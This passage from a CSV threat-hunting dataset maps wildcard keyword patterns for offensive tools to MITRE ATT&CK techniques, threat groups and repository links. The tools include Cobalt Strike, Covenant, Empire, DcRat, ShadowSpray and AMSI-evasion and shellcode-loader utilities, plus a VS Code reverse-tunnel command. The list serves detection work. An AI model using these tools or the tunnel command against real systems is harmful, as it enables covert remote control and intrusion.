and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*,offensive_tool_keyword,DcRat,DcRat C2 A simple remote tool in C#,T1071 - T1021 - T1003,TA0011,N/A,N/A,C2,https://github.com/qwqdanchun/DcRat,1,0,N/A,10,10,817,352,2022-02-07T05:37:09Z,2021-03-12T11:00:37Z -*CN=PortSwigger*,offensive_tool_keyword,burpsuite,The class-leading vulnerability scanning. penetration testing. 
and web app security platform,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation Tools,https://portswigger.net/burp,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*CN=ShadowSpray*,offensive_tool_keyword,ShadowSpray,A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.,T1110.003 - T1098 - T1059 - T1075,TA0001 - TA0008 - TA0009,N/A,N/A,Discovery,https://github.com/ShorSec/ShadowSpray,1,0,N/A,7,5,408,72,2022-10-14T13:36:51Z,2022-10-10T08:34:07Z -*cnotin/SplunkWhisperer2*,offensive_tool_keyword,SplunkWhisperer2,Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations,T1068 - T1059.003 - T1071.001,TA0003 - TA0002 - TA0011,N/A,N/A,Lateral Movement - Privilege Escalation,https://github.com/cnotin/SplunkWhisperer2,1,1,N/A,9,3,239,53,2022-09-30T16:41:17Z,2019-02-24T18:05:51Z -*Coalfire-Research*,offensive_tool_keyword,Github Username,Red team exploitation tools ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Coalfire-Research,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Coalfire-Research/Slackor*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*Cobalt Strike external C2*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,0,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*Cobalt Strike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltclip.cna*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*cobaltclip.exe*,offensive_tool_keyword,cobaltstrike,Cobaltstrike addons to interact with clipboard,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DallasFR/Cobalt-Clip,1,1,N/A,10,,N/A,,, -*cobaltstrike *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 
- T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike*,offensive_tool_keyword,cobaltstrike,cobaltstrike binary for windows - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations. 
these assessments benefit security operations and incident response.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike-*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobalt-strike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*-cobaltstrike*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - 
T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike.*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*CobaltStrike.LJ!MTB*,signature_keyword,Antivirus Signature,windows defender antivirus signature for UAC bypass,N/A,N/A,N/A,N/A,C2,N/A,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike.store*,offensive_tool_keyword,cobaltstrike,CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/AlphabugX/csOnvps,1,1,N/A,10,10,277,68,2022-03-19T00:10:03Z,2021-12-02T02:10:42Z -*cobaltstrike/*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike_*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*cobaltstrike-dist.tgz*,offensive_tool_keyword,AzureC2Relay,AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/Flangvik/AzureC2Relay,1,1,N/A,10,10,198,47,2021-02-15T18:06:38Z,2021-02-14T00:03:52Z -*cobbr/Covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*cobbr/Elite*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,1,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -*cobbr/PSAmsi*,offensive_tool_keyword,PSAmsi,PSAmsi is a tool for auditing and defeating AMSI signatures.,T1059.001 - T1562.001 - T1070.004,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/cobbr/PSAmsi,1,1,N/A,7,4,382,74,2018-04-22T20:56:33Z,2017-09-22T11:48:47Z -*cocfojppfigjeefejbpfmedgjbpchcng*,greyware_tool_keyword,SaferVPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A 
-*code.exe tunnel --accept-server-license-terms --name *,greyware_tool_keyword,vscode,Starts a reverse connection over global.rel.tunnels.api.visualstudio.com via websockets,T1090.003 - T1059.001 - T1071.001,TA0011 - TA0002,N/A,N/A,C2,https://badoption.eu/blog/2023/01/31/code_c2.html,1,0,risk of False positive,10,10,N/A,N/A,N/A,N/A -*code_execution/*.dll*,offensive_tool_keyword,empire,Empire dll paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1075,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*code_execution/*.exe*,offensive_tool_keyword,empire,Empire executable paths. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1135,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*code_execution/*.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1136,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*CodeExec-D37DA402-3829-492F-90D0-8EC3909514EB.json*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,1,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*CodeLoad(shellcode)*,offensive_tool_keyword,cobaltstrike,ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. 
currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 